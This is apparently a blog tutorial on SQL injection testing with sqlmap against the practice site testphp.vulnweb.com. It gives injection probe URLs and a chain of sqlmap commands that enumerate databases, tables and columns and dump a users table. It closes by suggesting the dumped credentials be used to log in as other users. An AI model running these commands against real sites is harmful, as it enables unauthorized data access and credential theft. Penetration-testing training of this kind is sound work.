Database Penetration Testing using Sqlmap #1

Database Penetration Testing using Sqlmap in KALi Linux

SQLMap Overview

SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. It enables the takeover of database servers with a powerful detection engine and numerous features tailored for advanced penetration testers. Its capabilities range from database fingerprinting and data extraction to accessing the file system and executing operating system commands via out-of-band connections.

Features

  • Database Management Systems: Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB, and Informix.
  • SQL Injection Techniques: Supports six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries, and out-of-band.
  • Direct Database Connection: Ability to connect directly to the database without SQL injection by providing DBMS credentials, IP address, port, and database name.
  • Enumeration: Supports enumerating users, password hashes, privileges, roles, databases, tables, and columns.
  • Password Cracking: Automatically recognizes password hash formats and supports cracking them using dictionary-based attacks.
  • Data Dumping: Supports dumping entire database tables, a range of entries, or specific columns. Users can also choose to dump only a range of characters from each column’s entry.
  • Database Search: Supports searching for specific database names, tables across all databases, or specific columns across all databases’ tables. Useful for identifying tables containing application credentials.
  • File Transfer: Supports downloading and uploading files from the database server’s file system when using MySQL, PostgreSQL, or Microsoft SQL Server.
  • Command Execution: Supports executing arbitrary commands and retrieving their standard output on the database server’s operating system when using MySQL, PostgreSQL, or Microsoft SQL Server.
  • Out-of-Band Connections: Supports establishing an out-of-band stateful TCP connection between the attacker's machine and the database server’s operating system, allowing for an interactive command prompt, a Meterpreter session, or a graphical user interface (VNC) session.
  • Privilege Escalation: Supports escalating the database process’s user privileges via Metasploit’s Meterpreter getsystem command.

SQLMap provides a comprehensive set of features for penetration testers, making it a versatile tool for assessing and exploiting SQL injection vulnerabilities.










When visiting websites that allow you to select product items through their picture gallery, you may notice that product items are referenced via their product-ID numbers in the URL. For example:

http://testphp.vulnweb.com/artists.php?artist=1

In such cases, an attacker often checks for SQL vulnerabilities in the web server to launch an SQL injection attack. SQL injection is a technique where an attacker can manipulate the SQL query by injecting malicious SQL code through the input fields or URL parameters. This can lead to unauthorized access to the database, allowing the attacker to retrieve, modify, or delete data.

Here's a brief outline of how an attacker might proceed:

  1. Identify Vulnerable Input: The attacker identifies input fields or URL parameters that might be susceptible to SQL injection.
  2. Test for Vulnerability: The attacker inserts SQL code into the input fields or URL parameters to test if the input is being properly sanitized. For example, they might try: http://testphp.vulnweb.com/artists.php?artist=1'
  3. Exploit the Vulnerability: Once confirmed, the attacker crafts specific SQL code to exploit the vulnerability. For instance, they might try: http://testphp.vulnweb.com/artists.php?artist=1 OR 1=1--
  4. Automate the Attack: Tools like SQLMap can automate the detection and exploitation of SQL injection vulnerabilities, making it easier for attackers to gain control over the database server.

    5. Preventing SQL Injection Attacks

    To protect against SQL injection attacks, web developers should adopt the following best practices:

    • Use Prepared Statements and Parameterized Queries: Ensure SQL queries are written in a way that separates data from code.
    • Validate and Sanitize Input: Properly validate and sanitize all user inputs to prevent malicious data from being processed.
    • Use ORM Frameworks: Object-Relational Mapping frameworks can help manage database interactions more securely.
    • Regular Security Audits: Regularly perform security audits and penetration testing to identify and fix vulnerabilities.
    • Update and Patch Systems: Keep your database and web server software up-to-date with the latest security patches.

    By implementing these measures, you can significantly reduce the risk of SQL injection attacks on your web applications.















Database: for database penetration testing we always choose SQMAP

open the terminal in your linux terminal type following which start sqlinjection attack on the target website.
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch














Here from the given screenshot, you can see we have successfully retrieve database name “acuart


Tables

As we know a database is a set of record which consist of multiple tables inside it therefore now use another command in order to fetch entire table names from inside the database system.


sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch

 -D: DBMS database to enumerate (fetched database name)

–tables: enumerate DBMS database table







As a result, given in screenshot, we have enumerated entire table name of the database system. There are 8 tables inside the database “acuart” as following:

T1: artists

T2: carts

T3: categ

T4: featured

T5: guestbook

T6: pictures

T7: products

T8: users








Columns

Now further we will try to enumerate the column name of the desired table. Since we know there is a users table inside the database acuart and we want to know all column names of users table, therefore, we will generate another command for column captions enumeration.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch

-T: DBMS table to enumerate (fetched table name)

–columns: enumerate DBMS database columns













Get data from a table

Slowly and gradually we have penetrated many details of the database but last and most important step is to retrieve information from inside the columns of a table. Hence, at last, we will generate a command which will dump information of users table.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch

–dump: dump all information of DBMS database







Here from the given screenshot, you can see it has to dump entire information of table users, mainly users table contains login credential of other users. You can use these credential for login into the server on behalf of other users.






Post a Comment